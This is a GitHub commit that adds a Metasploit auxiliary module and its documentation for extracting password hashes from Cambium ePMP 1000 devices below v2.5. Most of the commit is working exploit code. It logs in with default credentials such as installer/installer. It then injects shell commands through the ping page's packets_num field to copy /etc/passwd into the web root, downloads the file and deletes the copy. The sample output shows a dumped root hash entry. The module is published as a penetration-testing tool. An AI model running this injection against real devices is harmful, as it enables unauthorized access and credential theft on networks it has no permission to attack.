Skip to content

Commit fafd353

Browse files
juushyajuushya
committed
Add epmp1000 dump hashes module
1 parent 4f0ca5f commit fafd353

File tree

2 files changed

+282
-0
lines changed

2 files changed

+282
-0
lines changed

documentation/modules/auxiliary/scanner/http/epmp1000_dump_hashes.md

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to dump system hashes.
2+
3+
## Verification Steps
4+
5+
1. Do: ```use auxiliary/scanner/http/epmp1000_dump_hashes```
6+
2. Do: ```set RHOSTS [IP]```
7+
3. Do: ```set RPORT [PORT]```
8+
4. Do: ```run```
9+
10+
## Sample Output
11+
12+
```
13+
msf > use auxiliary/scanner/http/epmp1000_dump_hashes
14+
msf auxiliary(epmp1000_dump_hashes) > set rhosts 1.3.3.7
15+
msf auxiliary(epmp1000_dump_hashes) > set rport 80
16+
msf auxiliary(epmp1000_dump_hashes) > run
17+
18+
[+] 1.3.3.7:80 - Running Cambium ePMP 1000 version 2.2...
19+
[*] 1.3.3.7:80 - Attempting to login...
20+
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "installer":"installer"
21+
[*] ++++++++++++++++++++++++++++++++++++++
22+
[*] 1.3.3.7:80 - [1/1] - dumping password hashes
23+
root:$1$<hash>:0:0:root:/root:/bin/ash
24+
...
25+
...
26+
[*] ++++++++++++++++++++++++++++++++++++++
27+
[+] 1.3.3.7:80 - File retrieved successfully!
28+
[*] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000003_moduletest_1.3.3.7_ePMP_passwd_282393.txt
29+
[*] Scanned 1 of 1 hosts (100% complete)
30+
[*] Auxiliary module execution completed
31+
32+
```

modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb

Lines changed: 250 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,250 @@
1+
##
2+
# This module requires Metasploit: http://metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class MetasploitModule < Msf::Auxiliary
9+
include Msf::Exploit::Remote::HttpClient
10+
include Msf::Auxiliary::AuthBrute
11+
include Msf::Auxiliary::Report
12+
include Msf::Auxiliary::Scanner
13+
14+
def initialize(info={})
15+
super(update_info(info,
16+
'Name' => 'Cambium ePMP 1000 Password Hash Extractor',
17+
'Description' => %{
18+
This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to dump system hashes.
19+
},
20+
'References' =>
21+
[
22+
['URL', 'http://ipositivesecurity.blogspot.in/2015/11/cambium-epmp-1000-multiple.html'],
23+
['URL', 'https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83']
24+
],
25+
'Author' =>
26+
[
27+
'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
28+
],
29+
'License' => MSF_LICENSE,
30+
'DefaultOptions' => { 'VERBOSE' => true })
31+
)
32+
33+
register_options(
34+
[
35+
Opt::RPORT(80), # Application may run on a different port too. Change port accordingly.
36+
OptString.new('USERNAME', [true, 'A specific username to authenticate as', 'installer']),
37+
OptString.new('PASSWORD', [true, 'A specific password to authenticate with', 'installer'])
38+
], self.class
39+
)
40+
end
41+
42+
def run_host(ip)
43+
unless is_app_epmp1000?
44+
return
45+
end
46+
47+
each_user_pass do |user, pass|
48+
do_login(user, pass)
49+
end
50+
end
51+
52+
def report_cred(opts)
53+
service_data = {
54+
address: opts[:ip],
55+
port: opts[:port],
56+
service_name: opts[:service_name],
57+
protocol: 'tcp',
58+
workspace_id: myworkspace_id
59+
}
60+
61+
credential_data = {
62+
origin_type: :service,
63+
module_fullname: fullname,
64+
username: opts[:user],
65+
private_data: opts[:password],
66+
private_type: :password
67+
}.merge(service_data)
68+
69+
login_data = {
70+
last_attempted_at: Time.now,
71+
core: create_credential(credential_data),
72+
status: Metasploit::Model::Login::Status::SUCCESSFUL,
73+
proof: opts[:proof]
74+
}.merge(service_data)
75+
76+
create_credential_login(login_data)
77+
end
78+
79+
#
80+
# Check if App is Cambium ePMP 1000
81+
#
82+
83+
def is_app_epmp1000?
84+
begin
85+
res = send_request_cgi(
86+
{
87+
'uri' => '/',
88+
'method' => 'GET'
89+
}
90+
)
91+
92+
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
93+
print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
94+
return false
95+
end
96+
97+
if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Cambium HTTP Server') || res.body.include?('cambiumnetworks.com')))
98+
99+
get_epmp_ver = res.body.match(/"sw_version">([^<]*)/)
100+
epmp_ver = get_epmp_ver[1]
101+
print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000 version #{epmp_ver}...")
102+
103+
if ("#{epmp_ver}" >= '2.5')
104+
print_error('This ePMP version is not vulnerable. Module will not continue.')
105+
return false
106+
else
107+
return true
108+
end
109+
else
110+
print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. Module will not continue.")
111+
return false
112+
end
113+
end
114+
115+
#
116+
# Dump ePMP Password Hashes
117+
#
118+
119+
def do_login(user, pass)
120+
print_status("#{rhost}:#{rport} - Attempting to login...")
121+
begin
122+
res = send_request_cgi(
123+
{
124+
'uri' => '/cgi-bin/luci',
125+
'method' => 'POST',
126+
'headers' => { 'X-Requested-With' => 'XMLHttpRequest', 'Accept' => 'application/json, text/javascript, */*; q=0.01' },
127+
'vars_post' =>
128+
{
129+
'username' => 'dashboard',
130+
'password' => ''
131+
}
132+
}
133+
)
134+
135+
if (res && res.code == 200 && res.headers.include?('Set-Cookie') && res.headers['Set-Cookie'].include?('sysauth'))
136+
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
137+
138+
cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
139+
140+
res = send_request_cgi(
141+
{
142+
'uri' => '/cgi-bin/luci',
143+
'method' => 'POST',
144+
'cookie' => cookie1,
145+
'headers' => { 'X-Requested-With' => 'XMLHttpRequest', 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Connection' => 'close' },
146+
'vars_post' =>
147+
{
148+
'username' => user,
149+
'password' => pass
150+
}
151+
}
152+
)
153+
154+
end
155+
156+
if (res && res.code == 200 && res.headers.include?('Set-Cookie') && res.headers['Set-Cookie'].include?('stok='))
157+
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
158+
159+
report_cred(
160+
ip: rhost,
161+
port: rport,
162+
service_name: 'Cambium ePMP 1000',
163+
user: user,
164+
password: pass
165+
)
166+
167+
get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/)
168+
stok_value = get_stok[1]
169+
sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
170+
171+
cookie2 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
172+
173+
uri1 = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/ping'
174+
command = 'cp /etc/passwd /www/'
175+
inject = '|' + "#{command}" + ' ||'
176+
clean_inject = CGI.unescapeHTML(inject.to_s)
177+
178+
res = send_request_cgi(
179+
{
180+
'uri' => uri1,
181+
'method' => 'POST',
182+
'cookie' => cookie2,
183+
'headers' => { 'Accept' => '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest', 'ctype' => '*/*', 'Connection' => 'close' },
184+
'vars_post' =>
185+
{
186+
'ping_ip' => '8.8.8.8',
187+
'packets_num' => clean_inject,
188+
'buf_size' => 0,
189+
'ttl' => 1,
190+
'debug' => '0'
191+
}
192+
}
193+
)
194+
195+
file_location = '/'
196+
file_name = 'passwd'
197+
res = send_request_cgi({ 'method' => 'GET', 'uri' => "/#{file_location}/#{file_name}", 'cookie' => cookie2, 'headers' => { 'Accept' => '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest', 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8', 'Connection' => 'close' } }, 25)
198+
199+
if res && res.code == 200 && res.body =~ /root/
200+
vprint_status('++++++++++++++++++++++++++++++++++++++')
201+
vprint_status("#{rhost}:#{rport} - dumping password hashes")
202+
vprint_line("#{res.body}")
203+
vprint_status('++++++++++++++++++++++++++++++++++++++')
204+
205+
print_good("#{rhost}:#{rport} - File retrieved successfully!")
206+
path = store_loot('ePMP_passwd', 'text/plain', rhost, res.body, 'Cambium ePMP 1000 password hashes')
207+
print_status("#{rhost}:#{rport} - File saved in: #{path}")
208+
else
209+
print_error("#{rhost}:#{rport} - Failed to retrieve hashes")
210+
return
211+
end
212+
213+
command = 'rm /www/passwd'
214+
inject = '|' + "#{command}" + ' ||'
215+
clean_inject = CGI.unescapeHTML(inject.to_s)
216+
217+
res = send_request_cgi(
218+
{
219+
'uri' => uri1,
220+
'method' => 'POST',
221+
'cookie' => cookie2,
222+
'headers' => { 'Accept' => '*/*', 'Accept-Language' => 'en-US,en;q=0.5', 'Accept-Encoding' => 'gzip, deflate', 'X-Requested-With' => 'XMLHttpRequest', 'ctype' => '*/*', 'Connection' => 'close' },
223+
'vars_post' => { 'ping_ip' => '8.8.8.8', 'packets_num' => clean_inject, 'buf_size' => 0, 'ttl' => 1, 'debug' => '0' }
224+
}
225+
)
226+
227+
# Extract ePMP version
228+
res = send_request_cgi(
229+
{
230+
'uri' => '/',
231+
'method' => 'GET'
232+
}
233+
)
234+
235+
epmp_ver = res.body.match(/"sw_version">([^<]*)/)[1]
236+
237+
report_cred(
238+
ip: rhost,
239+
port: rport,
240+
service_name: "Cambium ePMP 1000 v#{epmp_ver}",
241+
user: user,
242+
password: pass
243+
)
244+
else
245+
# Login failed
246+
print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
247+
end
248+
end
249+
end
250+
end

0 commit comments

Comments
 (0)